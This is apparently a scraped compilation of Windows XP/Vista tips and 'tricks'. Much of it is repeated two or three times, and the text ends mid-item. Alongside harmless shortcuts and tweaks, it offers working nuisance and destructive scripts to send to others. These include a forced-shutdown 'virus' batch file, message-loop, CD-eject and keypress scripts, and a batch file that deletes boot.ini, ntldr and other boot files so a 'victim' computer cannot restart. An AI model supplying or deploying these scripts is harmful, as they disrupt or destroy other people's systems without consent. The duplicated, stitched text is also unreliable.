start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo DARI BLOGNYA ARDIANSYAHPUTRA.WORDPRESS.COM…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_Ganteng_Putra
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo COMING UP NEXT…….
echo BY ARDIANSYAH PUTRA
echo ELECTRICAL ENGINEERING, ANDALAS UNIVERSITY, WEST SUMATERA, INDONESIA
echo POETRA_ARDIANSYAH@YAHOO.CO.ID
echo CALL ME YACHH +6281363xxxxxx SMS JUG BOLEH LHO
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo SALAM DARI SI GANTENG : ARDIANSYAHPUTRA.
echo ARDIANSYAHPUTRA.WORDPRESS.COM
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BACK TO MASJID, BACK TO ISLAM.”
3. save as whatever.bat, ex: putra.bat
4. Activate it by click.
5. A shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes.
6.To Abort virus Click so that your PC is not shutdown: START - RUN and type command: shutdown -a before remaining time is over.
look at the fig. below
Smartest Way of Changing Drives(e.g C: E:) Icons
1:-Simply Choose an icon which you want to set as icon.
2:-Than Right Click on desktop and Chose "New Text Document"
Write this text in it
[autorun]
Icon="Icon name.ico" (without Quots)
3:-And then Go to File menu and choose "save as"
4:-Now Write name "Autorun.inf"
5:-Copy the file you created as well as your icon file to your desired Directory
6:-Restart Your PC and Be Amazed
Plz Dont Try if you have an Autorun Virus e.g Ravmon or Runounce in your PC
Things to Remember
1:-Use The mentioned text without Quots(means ")
2:-Always Write icon Name with Extention(e.g .ico)
3:-After Doing the Mentioned the Restart is Compulsory
thanks
Keep Smiling Always
2:-Than Right Click on desktop and Chose "New Text Document"
Write this text in it
[autorun]
Icon="Icon name.ico" (without Quots)
3:-And then Go to File menu and choose "save as"
4:-Now Write name "Autorun.inf"
5:-Copy the file you created as well as your icon file to your desired Directory
6:-Restart Your PC and Be Amazed
Plz Dont Try if you have an Autorun Virus e.g Ravmon or Runounce in your PC
Things to Remember
1:-Use The mentioned text without Quots(means ")
2:-Always Write icon Name with Extention(e.g .ico)
3:-After Doing the Mentioned the Restart is Compulsory
thanks
Keep Smiling Always
Manually Change XP SP2 to SP3
Change Manually XP SP2 to SP3 For GTA IV
Step 1: Run Regedit by Clicking on Start -> Run , type in regedit and press enter
Step 2: Make a backup of your registry (just in case)
Step 3: Browse to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Windows"
Step 4: Modify the value of "CSDVersion" from "0x00000200" (SP2) to the Windows XP SP3 value of "0x00000300"
Step 5: Close registry editor
Step 6: Reboot
Step 7: Start GTA and freakin enjoy it already!
Step 1: Run Regedit by Clicking on Start -> Run , type in regedit and press enter
Step 2: Make a backup of your registry (just in case)
Step 3: Browse to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Windows"
Step 4: Modify the value of "CSDVersion" from "0x00000200" (SP2) to the Windows XP SP3 value of "0x00000300"
Step 5: Close registry editor
Step 6: Reboot
Step 7: Start GTA and freakin enjoy it already!
top 5 virus in notepad!!
1>write in notepad
Cycle a message in your friend's computer(code is given below)
Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as "Anything.BAT" and send it.
__________________
2>write in notepad
Convey your friend a lil' message and shut down his/ her computer(code is given below)
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
__________________
3>This code when executed makes your Caps, Num, Scroll lock keys flash..
very attractive...i have tried it..trust me
*paste the code in notepad
*Save as disco.vbs
*Run the file
This piece of code makes your keyboard a live disco...
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
Enjoy
HOW TO REMOVE LIVE DISCO ON KEYBOARD WITHOUT CHANGING CODE.
OPEN TASK MANAGER THEN IN PROCESSES DELETE WSCRIPT.EXE FILE
__________________
4>write in notepad
Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!(code is given below)
Type :
Set oWMP = CreateObject("WMPlayer.OCX. 7")
Set colCDROMs = oWMP.cdromCollectio n
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
__________________
5>write in notepad
Frustrate your friend by making this VBScript hit Enter simultaneously(code is given below)
Type :
Set wshShell = wscript.CreateObjec t("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
Cycle a message in your friend's computer(code is given below)
Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as "Anything.BAT" and send it.
__________________
2>write in notepad
Convey your friend a lil' message and shut down his/ her computer(code is given below)
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
__________________
3>This code when executed makes your Caps, Num, Scroll lock keys flash..
very attractive...i have tried it..trust me
*paste the code in notepad
*Save as disco.vbs
*Run the file
This piece of code makes your keyboard a live disco...
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
Enjoy
HOW TO REMOVE LIVE DISCO ON KEYBOARD WITHOUT CHANGING CODE.
OPEN TASK MANAGER THEN IN PROCESSES DELETE WSCRIPT.EXE FILE
__________________
4>write in notepad
Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!(code is given below)
Type :
Set oWMP = CreateObject("WMPlayer.OCX. 7")
Set colCDROMs = oWMP.cdromCollectio n
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
__________________
5>write in notepad
Frustrate your friend by making this VBScript hit Enter simultaneously(code is given below)
Type :
Set wshShell = wscript.CreateObjec t("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
How to Move a mouse Pointer without a mouse
You can control your mouse pointer with keyboard keys in all windows versions. When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can performs all tasks same like a normal mouse.
Follow the given steps to activate the keyboard mouse:
1. To edit this feature, first you should log onto your computer with administrative rights.
2. To activate this feature, press Alt+Shift+NumLock keys at once and you will receive a small MouseKey box.
3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.
4. Click on Settings button, if you want to adjust the mouse cursor detail settings.
5. Here a new dialog box will appear with the title Settings for MouseKeys, now you can manage all mouse settings for example mouse cursor speed, acceleration and some other features.
Now using Numeric keypad, you can move your mouse pointer.
The controls are:
* 1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions.
* Key 5 is used as mouse click button.
* Insert key used to hold down mouse button.
* + Sign used to double click on any object.
* Delete button used to release the mouse.
* Click on NumLock button to disable this keyboard mouse feature
Follow the given steps to activate the keyboard mouse:
1. To edit this feature, first you should log onto your computer with administrative rights.
2. To activate this feature, press Alt+Shift+NumLock keys at once and you will receive a small MouseKey box.
3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.
4. Click on Settings button, if you want to adjust the mouse cursor detail settings.
5. Here a new dialog box will appear with the title Settings for MouseKeys, now you can manage all mouse settings for example mouse cursor speed, acceleration and some other features.
Now using Numeric keypad, you can move your mouse pointer.
The controls are:
* 1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions.
* Key 5 is used as mouse click button.
* Insert key used to hold down mouse button.
* + Sign used to double click on any object.
* Delete button used to release the mouse.
* Click on NumLock button to disable this keyboard mouse feature
5 letters and a click Download YouTube
Well all of you guys know alot of getting vids on youtube but i just want to share this very basic thing i do.
if you want to download vid from youtube just go to that clip; example;
Code:
Please register by clicking here to view content.
then type bajar
h t t p : / /w w w.bajaryoutube.com/watch?v=kqdcSFS2abY
it will show you another page, and simply click Download Video!
hope it help others
if you want to download vid from youtube just go to that clip; example;
Code:
Please register by clicking here to view content.
then type bajar
h t t p : / /w w w.bajaryoutube.com/watch?v=kqdcSFS2abY
it will show you another page, and simply click Download Video!
hope it help others
Image in folder background
This trick will help u in setting a pic in your folder background .
1.Go to Control panel -> Folder options -> view tab -> show hidden files
2.Uncheck the 2 boxes below it
3.Open a folder, search for a file desktop.ini
There u will have somecode like this or a bit different
[.ShellClassInfo] IconFile=%SystemRoot%\system32\SHELL32.dll IconIndex=3
4.Now add the lines below :
[ExtShellFolderViews] {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC} [{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=
5.Now copy the path location of the Picture or Wallpaper that u want to use and Paste it at the end of the line "image=" and paste the address path.
Example::
[ExtShellFolderViews] {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC} [{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=C:\Documents and Settings\win xp\My Documents\My Pictures\kihlo32qwe.jpg
6.Finally Refresh and Close the folder and check again
That's it Enjoy !!!!!!!!!
1.Go to Control panel -> Folder options -> view tab -> show hidden files
2.Uncheck the 2 boxes below it
3.Open a folder, search for a file desktop.ini
There u will have somecode like this or a bit different
[.ShellClassInfo] IconFile=%SystemRoot%\system32\SHELL32.dll IconIndex=3
4.Now add the lines below :
[ExtShellFolderViews] {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC} [{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=
5.Now copy the path location of the Picture or Wallpaper that u want to use and Paste it at the end of the line "image=" and paste the address path.
Example::
[ExtShellFolderViews] {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC} [{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=C:\Documents and Settings\win xp\My Documents\My Pictures\kihlo32qwe.jpg
6.Finally Refresh and Close the folder and check again
That's it Enjoy !!!!!!!!!
Funny Javascript Code
copy script, past it in ie browser address bar and hit enter. See what happens. You can customize code within.
Code:
javascript:function reverse() { var inp = " . $el(_)f ck(_)R. seluR r(_)Kn@ "; var outp = ""; for (i = 0; i <= inp.length ; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();
Code:
javascript:function reverse() { var inp = " . $el(_)f ck(_)R. seluR r(_)Kn@ "; var outp = ""; for (i = 0; i <= inp.length ; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();
Auto Shutdown PC With Timer, No Softwares Required
METHOD # 1
How To Make A Shutdown Timer!
Step 1:
Right click on your desktop and choose "New=>shortcuts".
Step 2:
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.
Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.
Step 3:
Make up a name for the shortcut and you're done.
You can change the icon by right c=>properities=>change icon=>browse.
To abort
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.
METHOD # 2
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run
Type Code:
Quote:
at 11:35 shutdown -s
to abort
Quote:
shutdown -a
**take note: all time are in 24hr, example u would like to shutdown at 8:30pm, you should type
"at 20:30 shutdown -s" without quote
METHOD # 3
you can use a batch for that as well it makes it easier to use
just run the batch and enter the time you want it to shutdown
shutdown.bat
Type Code
Quote:
@echo off
title Scheduled Shutdown Batch Example by q123
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit
METHOD # 4
in Run type
Quote:
shutdown -s -t 3600
36oo=seconds
to abort
in run type
Quote:
shutdown -a
How To Make A Shutdown Timer!
Step 1:
Right click on your desktop and choose "New=>shortcuts".
Step 2:
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.
Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.
Step 3:
Make up a name for the shortcut and you're done.
You can change the icon by right c=>properities=>change icon=>browse.
To abort
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.
METHOD # 2
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run
Type Code:
Quote:
at 11:35 shutdown -s
to abort
Quote:
shutdown -a
**take note: all time are in 24hr, example u would like to shutdown at 8:30pm, you should type
"at 20:30 shutdown -s" without quote
METHOD # 3
you can use a batch for that as well it makes it easier to use
just run the batch and enter the time you want it to shutdown
shutdown.bat
Type Code
Quote:
@echo off
title Scheduled Shutdown Batch Example by q123
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit
METHOD # 4
in Run type
Quote:
shutdown -s -t 3600
36oo=seconds
to abort
in run type
Quote:
shutdown -a
Javascript Trick - Corrupt Any Webpage
copy its contents and past in any already opened window's address bar containing URL or any web page address bar. You will see the contents of webpage will shift and rearrange position.
Code:
javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0)
Code:
javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0)
watch your window's "shaking it"
Copy and paste the java script code in the following red lines to the address bar of your browser
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
2: Press enter and watch your window's "shaking it". You can change the value of it if you wish
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
2: Press enter and watch your window's "shaking it". You can change the value of it if you wish
Trick to Increase Windows Vista Performance / Experience Index upto 9.9
We all know about new feature "Windows Experience or Performance Index" in Windows Vista. Its a new feature which automatically calculates your system performance index based on the hardware you have. It can be between 0.1 to 9.9
Better system hardware, better Performance Index and better system performance.
"Windows Performance Index" is shown in "System Properties" which can be accessed by right-clicking on "My Computer" icon on Desktop and select "Properties" or from "Control Panel".
Using this trick, you can increase that Index upto 9.9
The benefit of this hack is, there are a few features in Windows Vista which can only be used if your "Windows Experience Index" reaches the minimum requirements. So by increasing the Index manually, you can use those features.
Like You'll get toolbar in "Photo Gallery's Slide Show" while opening a wallpaper in Explorer.
How to:
1. Type following in Startmenu Searchbox / Run / Explorer Addressbar:
Quote:
%windir%\Performance\WinSAT\DataStore
And Press.
2. You'll one or more .xml files in the folder. Sort them by Date Created or look at their name. The file name will be in following format:
Quote:
2007-11-08 22.23.17.858 Assessment (Initial).WinSAT.xml
Where "2007-11-08 22.23.17.858" might differ from machine to machine and Windows Installation date/time.
3. Open the latest file in "Wordpad" and goto line having. It'll be approx. 12th line and will look like following:
Quote:
1
4
3.4
2.9
3.9
1
1
4.2
4. Now you can edit the numbers between > & < and can increase them upto 9.9 as following:
Quote:
9.9
9.9
9.9
9.9
9.9
9.9
9.9
9.9
5. Thats it. Save the file and check the Index again in System Properties. It'll 9.9 now.
NOTE: If you can't save the file, then take ownership of the file.
Better system hardware, better Performance Index and better system performance.
"Windows Performance Index" is shown in "System Properties" which can be accessed by right-clicking on "My Computer" icon on Desktop and select "Properties" or from "Control Panel".
Using this trick, you can increase that Index upto 9.9
The benefit of this hack is, there are a few features in Windows Vista which can only be used if your "Windows Experience Index" reaches the minimum requirements. So by increasing the Index manually, you can use those features.
Like You'll get toolbar in "Photo Gallery's Slide Show" while opening a wallpaper in Explorer.
How to:
1. Type following in Startmenu Searchbox / Run / Explorer Addressbar:
Quote:
%windir%\Performance\WinSAT\DataStore
And Press
2. You'll one or more .xml files in the folder. Sort them by Date Created or look at their name. The file name will be in following format:
Quote:
2007-11-08 22.23.17.858 Assessment (Initial).WinSAT.xml
Where "2007-11-08 22.23.17.858" might differ from machine to machine and Windows Installation date/time.
3. Open the latest file in "Wordpad" and goto line having
Quote:
4. Now you can edit the numbers between > & < and can increase them upto 9.9 as following:
Quote:
5. Thats it. Save the file and check the Index again in System Properties. It'll 9.9 now.
NOTE: If you can't save the file, then take ownership of the file.
Remove shortcut arrow from desktop icons
Here's how you can remove those shortcut arrows from your desktop icons in Windows XP.
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOTlnkfile
3. Delete the IsShortcut registry value.
You may need to restart Windows XP.
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOTlnkfile
3. Delete the IsShortcut registry value.
You may need to restart Windows XP.
Edit any website
Edit any website, take any webpage for example take google.com
Paste the below code in the address bar:
Code:
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0Then press Enter
Now edit and have fun !
Paste the below code in the address bar:
Code:
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0Then press Enter
Now edit and have fun !
How to shut down a computer FOREVER!
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun >:-D
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
or you can put in victim computer toooo.
and tell him to open it.
__________________
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun >:-D
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
or you can put in victim computer toooo.
and tell him to open it.
__________________
31-50awesome collection .computer personal must know
31.Removing Multiple Boot Screens:
If you are getting unwanted multiple boot screen
Then Follow these Steps.
1> Right Click on My Computer
2>Select Properties
3>Select Advanced Tab
4>Select Settings In the Startup & Recovery Section(3rd grp)
5>Select the operating system which u want.
6>And Click OK.
7>Further again press the setting and click on Edit.
8>It will open boot.ini File.
9>Now u can delete those o/s which you don't want to be displayed.
32.Make some short-cut ..make ur life easy.right click -->new--> short-cut n type
1.To lock The Computer :
>> Create a shortcut with the path rundll32.exeuser32.dll,LockWorkStation.
>> The Windows key + L is also a shortcut to this feature.
2.Creating The Suspend Shortcut:
Right click on the Desktop .New / Shortcut. Enter in rundll32.exe PowrProf.dll, SetSuspendState . Give it whatever name you want. Now when you click on that shortcut, your computer will shutdown and suspend.
3.Access The Task Manager Easier :
>>You can make a shortcut that points to %windir%\system32\taskmgr.exe Use key combinations
Ctrl+Shift+Esc
33.To change Drive Letters:
To change Drive Letters:
Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths."
From here you can add, remove or change drive letters and paths to the partition
34.lock any folder in XP
Lock any folder without using any software
1. Suppose you have a folder named anjali_sharma in D:\anjali_sharma.
2. In the same drive next to the folder create a new notepad file with the exact statement
ren anjali_sharma anjali_sharma.{21EC2020-3AEA-1069-A2DD-0
8002B30309D}
3. Now save this text file as loc.bat
4. Create another notepad file and type
ren anjali_sharma.{21EC2020-3AEA-1069-A2DD-08002B30309D} anjali_sharma
5. Save this as key.bat
6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed .
7. To open the folder double click key.bat and you get back your original folder.
8. For more safety keep the key.bat in another location . Only for unlocking copy paste to the original location and double click..
35.Create your own run command
Win+R to open the Run dialog
Enter %windir% to open the Windows directory
Alt+F W S to open the File menu, choose the New menu item, then the Shortcut menu item
Go through the wizard to create a shortcut to the desired program
The name you give the shortcut is what you type in the Run dialog to start the program
36.
Get Any Thing From Google
Songs
javascript:Qr='';if(!Qr){void(Qr=prompt(
'ENTER ARTIST OR SONG NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+mp3+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Ebook
javascript:Qr='';if(!Qr){void(Qr=prompt('Enter Author name OR Book name:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+pdf+OR+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Image
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER IMAGE NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+jpg+OR+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
movie
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER MOVIE NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+avi+OR+mov+OR+mpg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Application
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER Application NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+exe+OR+rar+OR+zip+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
game
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER GAME NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'% 22+exe+OR+iso+OR+rar+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Just copy these javascript and paste this in addrss bar and enter the details
37.Copy the following code in note pad and save it with extension anjali.vbs
just try thisonce
'code start from here:-
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
'code end from here
to end it go to taskmanager then
processes tab then end the wscript
38.Download Youtube Video without any software
javascript:b=fullscreenUrl;g=b.indexOf("
t=");d=b.indexOf("&hl");h=b.substring(g,d);link="h ttp://www.youtube.com/get_video?video_id=" + pageVideoId + "&" + h;location=(link);void(0)
JUST ADD THIS SCRIPT ON ADDRESS BAR OF YOUTUBE VIDEO
AND HIT ENTER..u hav the save option now ...just save ur video n play in any flv player or vlc
39.wannt to c ur own password without help of any unmasking software...just run this java script.
javascript: alert(document.getElementById('Passwd').
value);
Paste this in your address bar where you login after writting your login press enter and then you can see the Password.
40.Keyboard Shortcuts for Internet Explorer
To Select all items on a webpage use CTRL and A.
To Copy a selected item to the clipboard use CTRL and C.
To Paste an item from the clipboard into a document use CTRL and V.
To Add the current page/document to your favorites use CTRL and D.
To Open the IE search utility use CTRL and E.
To Open the FIND box to search the current document use CTRL and F.
To Open the History utility use CTRL and H.
To Open the Favorites utility use CTRL and I.
To Go to a new location/document use CTRL and L. Also CTRL and O.
To Open a new Explorer window use CTRL and N.
To Print the current page/document use CTRL and P.
To Refresh the current page/document use CTRL and R. Also you can use the F5 key.
To Save the current document/page use CTRL and S.
To Close the current Explorer window use CTRL and W.
These are achieved by holding down and pressing a combination of keys
To go to your default homepage use ALT and the HOME key.
To go forward one page (equivalent to the FORWARD button) use ALT and the right arrow key.
To go back one page (equivalent to the BACK button) use ALT and the left arrow key.
Type URL without a Mouse Click
In IE you can use Alt + D key combination to highlight the address bar.
41.
Code:
http://www.google.com/translate?langpair=en|en&u=www.(website
name which is currently not available).com
(where site.com is the site that you wish to visit)it is also useful to retrive some information from net which is currently not available.
42.Increase ur internet speed
goto run
type cmd
type ipconfig/all
note ur dns server ip
then again goto run
type ping -t
dont close the black window till u r using internet...
this trick actually forces data transfer making u browse faster..
u can typ the above ping command in a notepad file and save it as smthing.bat
now u just have to double click on the file
no gurannate this will increase ur speed but u can try this..
43.Hidden Movies in Windows XP...
Hey guyz, do u know that windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.
Go to Starts-->Programs-->Run
Type
telnet towel.blinkenlights.nl
And hit enter
try it if it works or not...n inform me too...
44.Some Notepad Trick
Trick1
1. Open a blank Notepad file
2. Write .LOG as the first line of the file, followed by a enter. Save the file and close it.
3. Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.
4. Type your notes and then save and close the file.
After that open the file and see the changes.
by this trick u can also use ur notebook as a personal diary.
Trick2
1.open notepad
2. type "bush hid the facts"
3. save it and close it...
4 then open it again........n see the changes...............
Trick3
Do you know the number of the flight that was used to attack the world Trade Centre????
The flight number was Q33N.
Now, open your Notepad, type the number of the flight (i.e. Q33N).
Now click on format>font, increase the font size upto 72, and change the font style to 'wingdings'. Now see the ammmaaazzzing thing.
Trick4
Over at WinCustomize, someone thought they'd found an Easter Egg in the Windows Notepad application. If you:
1. Open Notepad
2. Type the text "this app can break" (without quotes)
3. Save the file
4. Re-open the file in Notepad
Notepad displays seemingly-random Chinese characters, or boxes if your default Notepad font doesn't support those characters.
It's not an Easter egg (even though it seems like a funny one), and as it turns out, Notepad writes the file correctly. It's only when Notepad reads the file back in that it seems to lose its mind.
45.Mouse click/keyboard modifier combinations
• SHIFT+right click: Displays a shortcut menu containing alternative commands
• SHIFT+double click: Runs the alternate default command (the second item on the menu)
• ALT+double click: Displays properties
• SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin
46.
General keyboard-only commands
• F1: Starts Windows Help
• F10: Activates menu bar options
• SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object
• CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item)
• CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
• ALT+DOWN ARROW: Opens a drop-down list box
• ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
• SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
• ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
• ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
• CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
• ALT+underlined letter in menu: Opens the menu
• ALT+F4: Closes the current window
• CTRL+F4: Closes the current Multiple Document Interface (MDI) window
• ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)
Shell objects and general folder/Windows Explorer
•ALT+esc to switch between open programmes
47.Want to increase the font n images of any website pages(ZOOM IN N ZOOM out)...simply press ctrl and plus(+) button and u will notice the page will maginfy and if u want the font to be small simply press ctrl and minus(-) button...font will begin to reduce.just we use this button in photoshop
48.Hide Your Files In A JPEG
Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.
Ok, lets begin…
